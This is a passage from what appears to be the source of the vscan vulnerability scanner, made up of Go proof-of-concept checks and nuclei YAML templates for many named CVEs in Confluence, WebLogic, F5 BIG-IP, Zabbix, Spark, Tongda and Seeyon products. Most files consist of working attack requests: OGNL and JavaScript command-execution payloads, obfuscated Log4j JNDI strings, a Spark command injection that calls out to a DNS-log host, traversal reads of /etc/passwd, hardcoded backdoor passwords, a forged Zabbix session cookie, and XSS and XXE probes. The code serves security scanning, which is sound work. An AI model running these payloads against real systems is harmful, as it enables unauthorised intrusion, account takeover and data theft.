NewTCPSequencer() 11 | // tcp sequencer should be uint32 incremental 12 | for i := 0; i < 50000; i++ { 13 | actual := tcpSequencer.Next() 14 | assert.Equal(t, uint32(i), actual) 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /pocs_go/Springboot/CVE-2022-22965.go: -------------------------------------------------------------------------------- 1 | package Springboot 2 | 3 | import ( 4 | "github.com/veo/vscan/pkg" 5 | ) 6 | 7 | func CVE_2022_22965(u string) bool { 8 | if req, err := pkg.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil { 9 | if req.StatusCode == 500 { 10 | if req2, err := pkg.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil { 11 | if req2.StatusCode == 200 { 12 | return true 13 | } 14 | } 15 | } 16 | } 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /pocs_go/confluence/CVE-2021-26085.go: -------------------------------------------------------------------------------- 1 | package confluence 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_26085(u string) bool { 10 | if req, err := pkg.HttpRequset(u+"/s/1/_/;/WEB-INF/web.xml", "GET", "", false, nil); err == nil { 11 | if strings.Contains(req.Body, "display-name") { 12 | pkg.GoPocLog(fmt.Sprintf("Found Confluence CVE_2021_26085|--\"%s\"\n", u)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/confluence/CVE_2021_26084.go: -------------------------------------------------------------------------------- 1 | package confluence 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_26084(u string) bool { 10 | if req, err := pkg.HttpRequset(u+"/pages/doenterpagevariables.action", "POST", "queryString=vvv\\u0027%2b#{342*423}%2b\\u0027ppp", false, nil); err == nil { 11 | if strings.Contains(req.Body, "342423") { 12 | pkg.GoPocLog(fmt.Sprintf("Found Confluence CVE_2021_26084|--\"%s\"\n", u)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/confluence/CVE_2022_26318.go: -------------------------------------------------------------------------------- 1 | package confluence 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | //author:penson 硬编码添加用户 8 | 9 | func CVE_2022_26138(u string) bool { 10 | 11 | headers:=make(map[string]string,0) 12 | headers["Content-Type"]="application/x-www-form-urlencoded" 13 | if req, err := pkg.HttpRequset(u+"/dologin.action", "POST", "os_username=disabledsystemuser&os_password=disabled1system1user6708&login=%E7%99%BB%E5%BD%95&os_destination=", false, headers);err == nil { 14 | if req.StatusCode==302 && req.Header.Get("X-Seraph-LoginReason")=="OK"{ 15 | pkg.GoPocLog(fmt.Sprintf("Found Confluence CVE_2022_26138|--\"%s\"\n", u)) 16 | } 17 | 18 | return true 19 | } 20 | return false 21 | } 22 | -------------------------------------------------------------------------------- /pocs_go/f5/CVE_2020_5902.go: -------------------------------------------------------------------------------- 1 | package f5 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2020_5902(u string) bool { 10 | if req, err := pkg.HttpRequset(u+"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", "GET", "", false, nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "root") { 12 | pkg.GoPocLog(fmt.Sprintf("Found F5 BIG-IP CVE_2020_5902|--\"%s\"\n", u)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/jboss/CVE_2017_12149.go: -------------------------------------------------------------------------------- 1 | package jboss 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | 8 | func CVE_2017_12149(url string) bool { 9 | if req, err := pkg.HttpRequset(url+"/invoker/readonly", "GET", "", false, nil); err == nil { 10 | if req.StatusCode == 500 { 11 | pkg.GoPocLog(fmt.Sprintf("Found vuln Jboss CVE_2017_12149|%s\n", url)) 12 | return true 13 | } 14 | } 15 | return false 16 | } 17 | -------------------------------------------------------------------------------- /pocs_go/jenkins/CVE_2018_1000110.go: -------------------------------------------------------------------------------- 1 | package jenkins 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2018_1000110(u string) bool { 10 | if req, err := pkg.HttpRequset(u, "GET", "", false, nil); err == nil { 11 | if req.Header.Get("X-Jenkins-Session") != "" { 12 | if req2, err := pkg.HttpRequset(u+"/search/?q=a", "GET", "", false, nil); err == nil { 13 | if strings.Contains(req2.Body, "Search for 'a'") { 14 | pkg.GoPocLog(fmt.Sprintf("Found vuln Jenkins CVE_2018_1000110|%s\n", u)) 15 | return true 16 | } 17 | } 18 | } 19 | } 20 | return false 21 | } 22 | -------------------------------------------------------------------------------- /pocs_go/landray/Landray_RCE.go: -------------------------------------------------------------------------------- 1 | package landray 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | 7 | "github.com/veo/vscan/pkg" 8 | ) 9 | 10 | func Landray_RCE(u string) bool { 11 | payload := "s_bean=sysFormulaSimulateByJS&script=function%20test(){return%20java.lang.Runtime};r=test();r.getRuntime().exec(\"echo%20yes\")&type=1" 12 | 13 | if resp, err := pkg.HttpRequset(u+"/data/sys-common/datajson.js?"+payload, "GET", "", false, nil); err == nil { 14 | if strings.Contains(resp.Body, "模拟通过") { 15 | pkg.GoPocLog(fmt.Sprintf("Found vuln Landray OA RCE|%s\n", u)) 16 | return true 17 | } 18 | } 19 | 20 | return false 21 | } 22 | -------------------------------------------------------------------------------- /pocs_go/log4j/payloads.go: -------------------------------------------------------------------------------- 1 | package log4j 2 | 3 | var ( 4 | log4jJndiPayloads = []string{ 5 | "${jndi:ldap://dnslog-url}", 6 | "${jndi:ldap:${::-/}${::-/}dnslog-url}", 7 | "${${X::-j}ndi:rmi:${::-/}${X::-/}dnslog-url}", 8 | "${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}dnslog-url}}", 9 | } 10 | ) 11 | -------------------------------------------------------------------------------- /pocs_go/mcms/Front_Desk_sqlinject.go: -------------------------------------------------------------------------------- 1 | package mcms 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | //mcms 5.2.7 /cms/content/list 10 | func Front_Sql_inject(u string) bool { 11 | 12 | if req, err := pkg.HttpRequset(u+"/cms/content/list", "POST", "categoryId=1'", false, nil); err == nil { 13 | if strings.Contains(req.Body, "error in your SQL") { 14 | pkg.GoPocLog(fmt.Sprintf("Found mcms_sql_inject|\"%s\"\n", u+"/cms/content/list|POST:categoryId")) 15 | return true 16 | } 17 | } 18 | 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /pocs_go/phpunit/CVE_2017_9841.go: -------------------------------------------------------------------------------- 1 | package phpunit 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2017_9841(url string) bool { 10 | if req, err := pkg.HttpRequset(url+"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "POST", "", false, nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "PHP Version") { 12 | pkg.GoPocLog(fmt.Sprintf("Found vuln phpunit CVE_2017_9841\n")) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/seeyon/CNVD_2020_62422.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | //webmail.do任意文件下载 10 | 11 | func CNVD_2020_62422(u string) bool { 12 | if req, err := pkg.HttpRequset(u+"/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties", "GET", "", false, nil); err == nil { 13 | if req.StatusCode == 200 && strings.Contains(req.Body, "workflow") { 14 | pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon CNVD_2020_62422|%s\n", u+"/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties")) 15 | return true 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /pocs_go/seeyon/DownExcelBeanServlet.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | 8 | //DownExcelBeanServlet 用户敏感信息泄露 9 | 10 | func DownExcelBeanServlet(u string) bool { 11 | var vuln = false 12 | if req, err := pkg.HttpRequset(u+"/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", "GET", "", false, nil); err == nil { 13 | if req.StatusCode == 200 && req.Header.Get("Content-disposition") != "" { 14 | pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon DownExcelBeanServlet|%s\n", u+"/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0")) 15 | vuln = true 16 | } 17 | } 18 | return vuln 19 | } 20 | -------------------------------------------------------------------------------- /pocs_go/seeyon/GetSessionList.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | //getSessionList.jsp session 泄露 10 | 11 | func GetSessionList(u string) bool { 12 | if req, err := pkg.HttpRequset(u+"/yyoa/ext/https/getSessionList.jsp?cmd=getAll", "GET", "", false, nil); err == nil { 13 | if req.StatusCode == 200 && strings.Contains(req.Body, "sessionID") { 14 | pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon GetSessionList|%s\n", u+"/yyoa/ext/https/getSessionList.jsp?cmd=getAll")) 15 | return true 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /pocs_go/seeyon/InitDataAssess.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | //initDataAssess.jsp 用户敏感信息泄露 10 | 11 | func InitDataAssess(u string) bool { 12 | if req, err := pkg.HttpRequset(u+"/yyoa/assess/js/initDataAssess.jsp", "GET", "", false, nil); err == nil { 13 | if req.StatusCode == 200 && strings.Contains(req.Body, "personList") { 14 | pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon InitDataAssess|%s\n", u+"/yyoa/assess/js/initDataAssess.jsp")) 15 | 16 | return true 17 | } 18 | } 19 | return false 20 | } 21 | -------------------------------------------------------------------------------- /pocs_go/seeyon/ManagementStatus.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | //A8 状态监控页面信息泄露 10 | 11 | func ManagementStatus(u string) bool { 12 | if req, err := pkg.HttpRequset(u+"/seeyon/management/index.jsp", "POST", "password=WLCCYBD@SEEYON", false, nil); err == nil { 13 | if req.StatusCode == 302 && strings.Contains(req.Location, "status") { 14 | pkg.GoPocLog(fmt.Sprintf("Found vuln seeyon ManagementStatus|pssword:WLCCYBD@SEEYON|%s\n", u+"/seeyon/management/index.jsp")) 15 | return true 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /pocs_go/seeyon/sql.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | //'A6 test.jsp SQL注入漏洞' 4 | //'A6 setextno.jsp SQL注入漏洞' 5 | -------------------------------------------------------------------------------- /pocs_go/spark/CVE_2022_33891.go: -------------------------------------------------------------------------------- 1 | package spark 2 | 3 | import ( 4 | "fmt" 5 | "time" 6 | 7 | "github.com/veo/vscan/pkg" 8 | ) 9 | 10 | func CVE_2022_33891(u string) bool { 11 | if pkg.CeyeApi != "" && pkg.CeyeDomain != "" { 12 | randomstr := pkg.RandomStr() 13 | payload := fmt.Sprintf("doAs=`ping%%20%s`", randomstr+"."+pkg.CeyeDomain) 14 | pkg.HttpRequset(u+"/jobs/?"+payload, "GET", "", false, nil) 15 | time.Sleep(3 * time.Second) 16 | if pkg.Dnslogchek(randomstr) { 17 | pkg.GoPocLog(fmt.Sprintf("Found vuln Apache Spark CVE_2022_33891|%s\n", u)) 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | -------------------------------------------------------------------------------- /pocs_go/tomcat/CVE_2017_12615.go: -------------------------------------------------------------------------------- 1 | package tomcat 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | 8 | func CVE_2017_12615(url string) bool { 9 | if req, err := pkg.HttpRequset(url+"/vtset.txt", "PUT", "test", false, nil); err == nil { 10 | if req.StatusCode == 204 || req.StatusCode == 201 { 11 | pkg.GoPocLog(fmt.Sprintf("Found vuln Tomcat CVE_2017_12615|--\"%s/vtest.txt\"\n", url)) 12 | return true 13 | } 14 | } 15 | return false 16 | } 17 | -------------------------------------------------------------------------------- /pocs_go/tongda/api_ali_php_any_fileUpload.go: -------------------------------------------------------------------------------- 1 | package tongda 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | 8 | //version 通达 OA V11.8 api.ali.php 任意文件上传 9 | func File_upload(url string) bool{ 10 | if req, err := pkg.HttpRequset(url+"/mobile/api/api.ali.php", "GET", "", false, nil); err == nil { 11 | if req.StatusCode==200{ 12 | pkg.GoPocLog(fmt.Sprintf("Found vuln tongda-OA upload in api.ali.php | \"%s\"\n", url)) 13 | return true 14 | } 15 | } 16 | return false 17 | } -------------------------------------------------------------------------------- /pocs_go/tongda/file_delete.go: -------------------------------------------------------------------------------- 1 | package tongda 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | //version 通达 OA V11.6 任意文件删除 10 | func File_delete(url string) bool{ 11 | if req, err := pkg.HttpRequset(url+"/module/appbuilder/assets/print.php?guid=../../../1", "GET", "", false, nil); err == nil { 12 | if strings.Contains(req.Body,"未知参数"){ 13 | pkg.GoPocLog(fmt.Sprintf("Found tongda-OA file delete in print.php you can try to upload|%s\n", url)) 14 | return true 15 | } 16 | } 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /pocs_go/tongda/get_user_session.go: -------------------------------------------------------------------------------- 1 | package tongda 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "regexp" 7 | ) 8 | 9 | //version 通达 OA V11.6 任意用户登陆 10 | func Get_user_session(url string) bool{ 11 | 12 | 13 | if req, err:=pkg.HttpRequset(url+"/inc/auth.inc.php","GET","",false,nil); err == nil { 14 | re,_:= regexp.Match("\"code_uid\":\"{.*?}\"",[]byte(req.Body)) 15 | if re{ 16 | pkg.GoPocLog(fmt.Sprintf("Found vuln tongda-OA any_user_Login | \"%s\"\n", "you can use session to login")) 17 | return true 18 | } 19 | 20 | return false 21 | } 22 | 23 | return false 24 | } 25 | -------------------------------------------------------------------------------- /pocs_go/weblogic/CVE_2014_4210.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | 8 | func CVE_2014_4210(url string) bool { 9 | if req, err := pkg.HttpRequset(url+"/uddiexplorer/SearchPublicRegistries.jsp", "GET", "", false, nil); err == nil { 10 | if req.StatusCode == 200 { 11 | pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2014_4210|%s\n", url)) 12 | return true 13 | } 14 | } 15 | return false 16 | } 17 | -------------------------------------------------------------------------------- /pocs_go/weblogic/CVE_2018_2894.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | ) 7 | 8 | func CVE_2018_2894(url string) bool { 9 | if req, err := pkg.HttpRequset(url+"/ws_utc/begin.do", "GET", "", false, nil); err == nil { 10 | if req2, err2 := pkg.HttpRequset(url+"/ws_utc/config.do", "GET", "", false, nil); err2 == nil { 11 | if req.StatusCode == 200 || req2.StatusCode == 200 { 12 | pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2018_2894|%s\n", url)) 13 | return true 14 | } 15 | } 16 | } 17 | return false 18 | } 19 | -------------------------------------------------------------------------------- /pocs_go/weblogic/CVE_2020_14882.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2020_14882(url string) bool { 10 | if req, err := pkg.HttpRequset(url+"/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a", "GET", "", false, nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "/console/dashboard") { 12 | pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2020_14882|%s\n", url)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/weblogic/CVE_2021_2109.go: -------------------------------------------------------------------------------- 1 | package weblogic 2 | 3 | import ( 4 | "fmt" 5 | "github.com/veo/vscan/pkg" 6 | "strings" 7 | ) 8 | 9 | func CVE_2021_2109(url string) bool { 10 | if req, err := pkg.HttpRequset(url+"/console/css/%252e%252e%252f/consolejndi.portal", "GET", "", false, nil); err == nil { 11 | if req.StatusCode == 200 && strings.Contains(req.Body, "Weblogic") { 12 | pkg.GoPocLog(fmt.Sprintf("Found vuln Weblogic CVE_2021_2109|%s\n", url)) 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/zabbix/CVE-2022-23131.go: -------------------------------------------------------------------------------- 1 | package zabbix 2 | 3 | import ( 4 | "github.com/veo/vscan/pkg" 5 | "strings" 6 | ) 7 | 8 | func CVE_2022_23131(zabbixurl string) bool { 9 | header := make(map[string]string) 10 | header["Cookie"] = "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" 11 | if req, err := pkg.HttpRequset(zabbixurl+"/index_sso.php", "GET", "", false, header); err == nil { 12 | if req.StatusCode == 302 && strings.Contains(req.Location, "zabbix.php?action") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /pocs_go/zentao/CNVD_2022_42853.go: -------------------------------------------------------------------------------- 1 | package zentao 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | 7 | "github.com/veo/vscan/pkg" 8 | ) 9 | 10 | // zentao/user-login.html SQL注入 11 | 12 | func CNVD_2022_42853(u string) bool { 13 | payload := "account='" 14 | 15 | header := make(map[string]string) 16 | header["Referer"] = u + "/zentao/user-login.html" 17 | if response, err := pkg.HttpRequset(u+"/zentao/user-login.html", "POST", payload, false, header); err == nil { 18 | if response.StatusCode == 200 && strings.Contains(response.Body, "You have an error in your SQL syntax;") { 19 | pkg.GoPocLog(fmt.Sprintf("Found vuln zentao CNVD-2022-42853|%s\n", u+"/zentao/user-login.html")) 20 | return true 21 | } 22 | } 23 | return false 24 | } 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/cnvd/2018/CNVD-2018-13393.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2018-13393 2 | 3 | info: 4 | name: Metinfo LFI 5 | author: ritikchaddha 6 | severity: high 7 | reference: 8 | - https://paper.seebug.org/676/ 9 | tags: metinfo,cnvd,cvnd2018,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "(.*?)" 21 | - "(.*?)" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/cves/2018/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI 8 | classification: 9 | cve-id: CVE-2018-16341 10 | tags: cve,cve2018,nuxeo,ssti,rce,bypass 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" 16 | matchers: 17 | - type: word 18 | words: 19 | - "31333333337" 20 | part: body 21 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/default-logins/openwrt/openwrt-default-login.yaml: -------------------------------------------------------------------------------- 1 | id: openwrt-default-login 2 | 3 | info: 4 | name: Opentwrt Default Login 5 | author: For3stCo1d 6 | severity: high 7 | reference: 8 | - https://forum.archive.openwrt.org/viewtopic.php?id=16611 9 | metadata: 10 | shodan-query: http.title:"OpenWrt - LuCI" 11 | tags: openwrt,default-login 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/cgi-bin/luci" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - 'cgi-bin/luci/admin/system/admin' -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/generic/basic-xss-prober.yaml: -------------------------------------------------------------------------------- 1 | id: basic-xss-prober 2 | 3 | info: 4 | name: Basic XSS Prober 5 | author: nadino,geeknik 6 | severity: low 7 | tags: xss,generic 8 | 9 | # Basic XSS prober 10 | # Manual testing needed for exploitation 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | words: 21 | - "\">" 22 | part: body 23 | 24 | - type: word 25 | words: 26 | - "text/html" 27 | part: header 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/generic/generic-blind-xxe.yaml: -------------------------------------------------------------------------------- 1 | id: generic-blind-xxe 2 | 3 | info: 4 | name: Generic Blind XXE 5 | author: geeknik 6 | severity: high 7 | tags: xxe,generic,blind 8 | 9 | requests: 10 | - raw: 11 | - | 12 | POST / HTTP/1.1 13 | Host: {{Hostname}} 14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 15 | Referer: {{BaseURL}} 16 | 17 | 18 | 19 | &e1; 20 | 21 | matchers: 22 | - type: word 23 | part: interactsh_protocol 24 | words: 25 | - "http" 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/httpbin/httpbin-open-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: httpbin-open-redirect 2 | 3 | info: 4 | name: HTTPBin - Open Redirect 5 | author: Adam Crosser 6 | severity: low 7 | reference: 8 | - https://github.com/postmanlabs/httpbin 9 | metadata: 10 | shodan-query: 11 | - html:"https://github.com/requests/httpbin" 12 | - title:"httpbin.org" 13 | tags: redirect,httpbin,oss 14 | 15 | requests: 16 | - method: GET 17 | path: 18 | - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh" 19 | 20 | matchers-condition: and 21 | matchers: 22 | - type: dsl 23 | dsl: 24 | - 'location == "https://interact.sh"' 25 | 26 | - type: status 27 | status: 28 | - 302 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/huawei/huawei-hg255s-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-hg255s-lfi 2 | 3 | info: 4 | name: Huawei HG255s - Directory Traversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2017090053 9 | - https://www.youtube.com/watch?v=n02toTFkLOU 10 | metadata: 11 | shodan-query: http.html:"HG532e" 12 | tags: huawei,lfi,router 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/ibm/eclipse-help-system-xss.yaml: -------------------------------------------------------------------------------- 1 | id: eclipse-help-system-xss 2 | 3 | info: 4 | name: Eclipse Help System RXSS vulnerability 5 | author: pikpikcu 6 | severity: medium 7 | tags: ibm,xss 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | - type: word 23 | words: 24 | - "text/html" 25 | part: header -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/ibm/ibm-infoprint-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: ibm-infoprint-lfi 2 | 3 | info: 4 | name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal 5 | author: harshbothra_ 6 | severity: medium 7 | description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. 8 | reference: 9 | - https://www.exploit-db.com/exploits/47835 10 | tags: ibm,lfi,matrix,printer 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/./../../../../../../../../../../etc/passwd' 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:.*:0:0:" 24 | part: body 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jenkins/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: info 7 | reference: 8 | - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 9 | - https://issues.jenkins.io/browse/JENKINS-30107 10 | - https://issues.jenkins.io/browse/JENKINS-18884 11 | - https://issues.jenkins.io/browse/JENKINS-26469 12 | tags: jenkins 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/asynchPeople/" 18 | matchers: 19 | - type: word 20 | words: 21 | - "People - [Jenkins]" 22 | part: body 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml: -------------------------------------------------------------------------------- 1 | id: unaunthenticated-jenkin 2 | 3 | info: 4 | name: Unauthenticated Jenkins Dashboard 5 | author: dhiyaneshDK 6 | severity: high 7 | tags: jenkins 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Dashboard [Jenkins] 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-service-desk-signup.yaml: -------------------------------------------------------------------------------- 1 | id: jira-service-desk-signup 2 | 3 | info: 4 | name: Jira Service Desk Signup 5 | author: TechbrunchFR 6 | severity: medium 7 | tags: jira,atlassian,service 8 | 9 | requests: 10 | - method: POST 11 | path: 12 | - "{{BaseURL}}/servicedesk/customer/user/signup" 13 | headers: 14 | Content-Type: application/json 15 | body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}' 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "signup.validation.errors" 21 | - type: status 22 | status: 23 | - 400 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-adminprojects 2 | 3 | info: 4 | name: Jira Unauthenticated Admin Projects 5 | author: TESS 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/menu/latest/admin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'key' 19 | - 'link' 20 | - 'label' 21 | - 'self' 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | - type: word 29 | part: header 30 | words: 31 | - "atlassian.xsrf.token" 32 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projectcategories 2 | 3 | info: 4 | name: Jira Unauthenticated Project Categories 5 | author: TESS 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'self' 19 | - 'description' 20 | - 'name' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 27 | - type: word 28 | part: header 29 | words: 30 | - "atlassian.xsrf.token" 31 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: 